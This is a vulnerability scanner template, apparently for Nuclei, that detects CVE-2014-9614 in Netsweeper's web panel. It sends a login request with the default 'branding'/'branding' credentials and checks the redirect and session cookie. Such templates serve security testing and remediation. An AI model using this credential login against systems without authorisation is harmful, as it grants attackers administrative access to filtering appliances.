id: CVE-2014-9614 info: name: Netsweeper 4.0.5 - Default Weak Account author: daffainfo severity: critical description: The Web Panel in Netsweeper before 4.0.5 has a default password of 'branding' for the branding account, which makes it easier for remote attackers to obtain access via a request to webadmin/. reference: - https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz - https://nvd.nist.gov/vuln/detail/CVE-2014-9614 - http://packetstormsecurity.com/files/133034/Netsweeper-Bypass-XSS-Redirection-SQL-Injection-Execution.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2014-9614 cwe-id: CWE-798 tags: cve,cve2014,netsweeper,default-login,packetstorm http: - raw: - | POST /webadmin/auth/verification.php HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} Referer: {{BaseURL}}/webadmin/start/ login=branding&password=branding&Submit=Login matchers-condition: and matchers: - type: status status: - 302 - type: word part: header words: - 'Location: ../common/' - 'Location: ../start/' condition: or - type: word part: header words: - 'Set-Cookie: webadminU=' # Enhanced by mp on 2022/02/25